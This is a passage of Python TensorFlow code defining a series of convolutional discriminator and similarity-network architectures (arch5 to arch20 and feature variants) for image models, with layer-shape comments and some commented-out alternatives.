h1 = lrelu(conv2d(pool1, 192, k_h=5, k_w=5, d_h=1, d_w=1, name='s_h1_conv'))
pool2 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool2', padding='same')
h2 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
out = dense(h2, input_size=3, output_size=1, num_channels=256,
reuse=reuse, name='s_dense_out')
return tf.nn.sigmoid(out), out, params['entropy']
archs['arch5'] = arch5
def arch6(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [2, 2], [2, 2], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
# flat = tf.layers.flatten(h1,name='s_flatten')
# out = dense(flat, input_size=32, output_size=1024, num_channels=128,
# reuse=reuse, name='s_dense_out')
out = (conv2d(h1, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
return tf.nn.sigmoid(out), out, params['entropy']
archs['arch6'] = arch6
def arch7(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [3, 3], [3, 3], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 128, k_h=5, k_w=5, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
h = h1
for i in range(3):
h = residual_block(h, n_channels=128, kernel_size=3, scope="resBlock_"+str(i), reuse=reuse)
h = lrelu(conv2d(h, 64, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
h = (conv2d(h, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h3_conv'))
return tf.nn.sigmoid(h), h, params['entropy']
archs['arch7'] = arch7
def arch8(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = (image+1)/2
h = tf.pad(h, [[0, 0], [8, 8], [8, 8], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, 128, k_h=15, k_w=15, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
h = h1
for i in range(5):
h = residual_block(h, n_channels=256, kernel_size=3, scope="resBlock_"+str(i), reuse=reuse)
h = lrelu(conv2d(h, 128, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h2_conv'))
h = (conv2d(h, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h3_conv'))
return tf.nn.sigmoid(h), h, params['entropy']
archs['arch8'] = arch8
def arch9(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
# 8*8*256
# flat = tf.layers.flatten(h4,name='s_flatten')
d1 = lrelu(dense(h4, input_size=8, output_size=self.df_dim*16, num_channels=self.df_dim*4,
reuse=reuse, name='s_dense_out1'))
d3 = dense(d1, input_size=4, output_size=1, num_channels=self.df_dim,
reuse=reuse, name='s_dense_out3')
# return tf.nn.softmax(d3), d3, 'softmax'
return tf.nn.sigmoid(d3), d3, params['entropy']
archs['arch9'] = arch9
def arch10(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
h0 = lrelu(conv2d(h, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
# 8*8*256
# flat = tf.layers.flatten(h4,name='s_flatten')
d1 = lrelu(dense(h4, input_size=8, output_size=1024, num_channels=256,
reuse=reuse, name='s_dense_out1'))
d2 = lrelu(dense(d1, input_size=2, output_size=1024, num_channels=256,
reuse=reuse, name='s_dense_out2'))
d3 = dense(d2, input_size=2, output_size=1, num_channels=256,
reuse=reuse, name='s_dense_out3')
# return tf.nn.softmax(d3), d3, 'softmax'
return tf.nn.sigmoid(d3), d3, params['entropy']
archs['arch10'] = arch10
def arch12(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool2')
h7 = lrelu(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'))
# 4x4x256
dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
dh1 = lrelu(deconv2d(h7,output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
# 8x8x128
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(deconv2d(dh1,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
# 16x16x64
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch12'] = arch12
def arch13(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
bp = 11
h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1',padding='VALID')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv',pad="VALID_NOPAD"))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv',pad="VALID_NOPAD"))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2',padding='VALID')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv',pad="VALID_NOPAD"))
# # 8x8x256
# 8x8x128
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(deconv2d(h4,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
# 16x16x64
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch13'] = arch13
def arch14(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
bp = 11
h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1',padding='VALID')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv',pad="VALID_NOPAD"))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv',pad="VALID_NOPAD"))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2',padding='VALID')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv',pad="VALID_NOPAD"))
h4 = conv2d(h4, 1, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h5_conv')
out = tf.image.resize_images(h4, [tf.shape(image)[1], tf.shape(image)[2]])
return tf.nn.sigmoid(out), out, params['entropy']
archs['arch14'] = arch14
def arch15(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
# 32x32x6
h = ((image+1)/2)
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
# 8x8x128
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim*2])
dh2 = lrelu(deconv2d(h6,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim*2))
# 16x16x64
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch15'] = arch15
def arch16(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
#32x32x6
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
#32x32xself.df_dim
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
#32x32xself.df_dim
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
#16x16xself.df_dim
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
#16x16xself.df_dim*2
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
#16x16xself.df_dim*2
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
#8x8xself.df_dim*2
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
h6 = lrelu(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'))
#8x8xself.df_dim*4
pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool2')
#4x4xself.df_dim*4
h7 = lrelu(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'))
# 4x4x256
dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
dh1 = lrelu(deconv2d(h7,output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
dh1 = tf.concat([dh1, pool2], 3)
# 8x8x128 x2
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(deconv2d(dh1,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
dh2 = tf.concat([dh2, pool1], 3)
# 16x16x64 x2
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch16'] = arch16
def arch17(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
#32x32x6
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
#32x32xself.df_dim
h1 = lrelu(instance_norm(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'), scope="s_h1_IN"))
#32x32xself.df_dim
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
#16x16xself.df_dim
h2 = lrelu(instance_norm(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'), scope="s_h2_IN"))
#16x16xself.df_dim*2
h3 = lrelu(instance_norm(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'), scope="s_h3_IN"))
#16x16xself.df_dim*2
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
#8x8xself.df_dim*2
h4 = lrelu(instance_norm(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'), scope="s_h4_IN"))
h5 = lrelu(instance_norm(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'), scope="s_h5_IN"))
h6 = lrelu(instance_norm(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'), scope="s_h6_IN"))
#8x8xself.df_dim*4
pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool2')
#4x4xself.df_dim*4
h7 = lrelu(instance_norm(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'), scope="s_h7_IN"))
# 4x4x256
dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
dh1 = lrelu(instance_norm(deconv2d(h7,output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2), scope="s_dh1_IN"))
dh1 = tf.concat([dh1, pool2], 3)
# 8x8x128 x2
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(instance_norm(deconv2d(dh1,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim),scope="s_dh2_IN"))
dh2 = tf.concat([dh2, pool1], 3)
# 16x16x64 x2
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch17'] = arch17
def arch18(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
#32x32x6
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
#32x32xself.df_dim
h1 = lrelu(instance_norm(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'), scope="s_h1_IN"))
#32x32xself.df_dim
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
#16x16xself.df_dim
h2 = lrelu(instance_norm(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'), scope="s_h2_IN"))
#16x16xself.df_dim*2
h3 = lrelu(instance_norm(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'), scope="s_h3_IN"))
#16x16xself.df_dim*2
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
#8x8xself.df_dim*2
h4 = lrelu(instance_norm(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'), scope="s_h4_IN"))
h5 = lrelu(instance_norm(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'), scope="s_h5_IN"))
h6 = lrelu(instance_norm(conv2d(h5, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h6_conv'), scope="s_h6_IN"))
#8x8xself.df_dim*4
pool3 = max_pooling2d(h6, [2, 2], [2, 2], name='s_pool2')
#4x4xself.df_dim*4
h7 = lrelu(instance_norm(conv2d(pool3, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h7_conv'), scope="s_h7_IN"))
# 4x4x256
dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
dh1 = lrelu(instance_norm(tf.nn.dropout(deconv2d(h7,output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2), 0.5), scope="s_dh1_IN"))
dh1 = tf.concat([dh1, pool2], 3)
# 8x8x128 x2
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(instance_norm(deconv2d(dh1,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim),scope="s_dh2_IN"))
dh2 = tf.concat([dh2, pool1], 3)
# 16x16x64 x2
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch18'] = arch18
def arch19(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)
# 32x32x6
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = lrelu(conv2d(h4, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h5_conv'))
# 8x8x128
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh2 = lrelu(deconv2d(h5,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
# 16x16x64
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh2 = tf.concat([dh2, h3], 3)
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch19'] = arch19
def arch20(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h = ((image+1)/2)*0.79375
# 32x32x2
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
# 32x32xself.df_dim
pool1 = max_pooling2d(h0, [3, 3], [2, 2], name='s_pool1', padding='same')
# 16x16xself.df_dim
h1 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
# 16x16xself.df_dim*2
pool2 = max_pooling2d(h1, [3, 3], [2, 2], name='s_pool2', padding='same')
# 8x8xself.df_dim*2
h2 = lrelu(conv2d(pool2, self.df_dim*4, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
# 8x8xself.df_dim*4
pool3 = max_pooling2d(h2, [3, 3], [2, 2], name='s_pool3', padding='same')
# 4x4xself.df_dim*4
dh1_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/4), tf.to_int32(tf.shape(image)[2]/4), self.df_dim*2])
dh1 = lrelu(deconv2d(pool3,output_shape=dh1_out_shape, name='s_dh1', filters=self.df_dim*2))
# 8x8xself.df_dim*2
dh2_out_shape = tf.stack([tf.shape(image)[0], tf.to_int32(tf.shape(image)[1]/2), tf.to_int32(tf.shape(image)[2]/2), self.df_dim])
dh1 = tf.concat([dh1, pool2], 3)
dh2 = lrelu(deconv2d(dh1,output_shape=dh2_out_shape, name='s_dh2', filters=self.df_dim))
# 16x16x64
dh3_out_shape = tf.stack([tf.shape(image)[0], tf.shape(image)[1], tf.shape(image)[2], 1])
dh2 = tf.concat([dh2, pool1], 3)
dh3 = deconv2d(dh2,output_shape=dh3_out_shape, name='s_dh3', filters=1)
# 32x32x1
return tf.nn.sigmoid(dh3), dh3, params['entropy']
archs['arch20'] = arch20
# def feat1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# with tf.variable_scope("discriminator") as scope:
#
# input = tf.concat([params['sem_seg'], image], 3)
#
# h0 = lrelu(conv2d(input, self.df_dim, name='d_h0_conv'))
# # h0 is (128 x 128 x self.df_dim)
# h1 = lrelu(instance_norm(conv2d(h0, self.df_dim*2, name='d_h1_conv'), scope="d_h1_IN"))
# # h1 is (64 x 64 x self.df_dim*2)
# h2 = lrelu(instance_norm(conv2d(h1, self.df_dim*4, name='d_h2_conv'), scope="d_h2_IN"))
# # h2 is (32x 32 x self.df_dim*4)
#
# return tf.nn.sigmoid(h2), h2, params['entropy']
#
# archs['feat1'] = feat1
def feat1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
input = tf.concat([params['sem_seg'], image], 3)
h0 = lrelu(conv2d_from_tensors(input, self.conv_dict['w0'], self.conv_dict['b0']))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(instance_norm(conv2d_from_tensors(h0, self.conv_dict['w1'], self.conv_dict['b1']), scope="s_h1_IN"))
# h1 is (64 x 64 x self.df_dim*2)
h2 = lrelu(instance_norm(conv2d_from_tensors(h1, self.conv_dict['w2'], self.conv_dict['b2']), scope="s_h2_IN"))
# h2 is (32x 32 x self.df_dim*4)
return tf.nn.sigmoid(h2), h2, params['entropy']
archs['feat1'] = feat1
def feat1A(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
input = tf.concat([params['sem_seg'], image], 3)
h0 = lrelu(conv2d_from_tensors(input, self.conv_dict['w0'], self.conv_dict['b0']))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(instance_norm_from_tensors(conv2d_from_tensors(h0, self.conv_dict['w1'], self.conv_dict['b1']), scale=self.conv_dict['s1'], offset=self.conv_dict['o1']))
# h1 is (64 x 64 x self.df_dim*2)
h2 = lrelu(instance_norm_from_tensors(conv2d_from_tensors(h1, self.conv_dict['w2'], self.conv_dict['b2']), scale=self.conv_dict['s2'], offset=self.conv_dict['o2']))
# h2 is (32x 32 x self.df_dim*4)
return tf.nn.sigmoid(h2), h2, params['entropy']
archs['feat1A'] = feat1A
def feat2(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
# image = tf.concat([image, params['sem_seg']], 3)
h = ((image+1)/2)*0.79375
bp = 11
h = tf.pad(h, [[0, 0], [bp, bp], [bp, bp], [0, 0]], "REFLECT")
h0 = lrelu(conv2d(h, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv',pad="VALID_NOPAD"))
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv',pad="VALID_NOPAD"))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1',padding='VALID')
h2 = lrelu(conv2d(pool1, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv',pad="VALID_NOPAD"))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv',pad="VALID_NOPAD"))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2',padding='VALID')
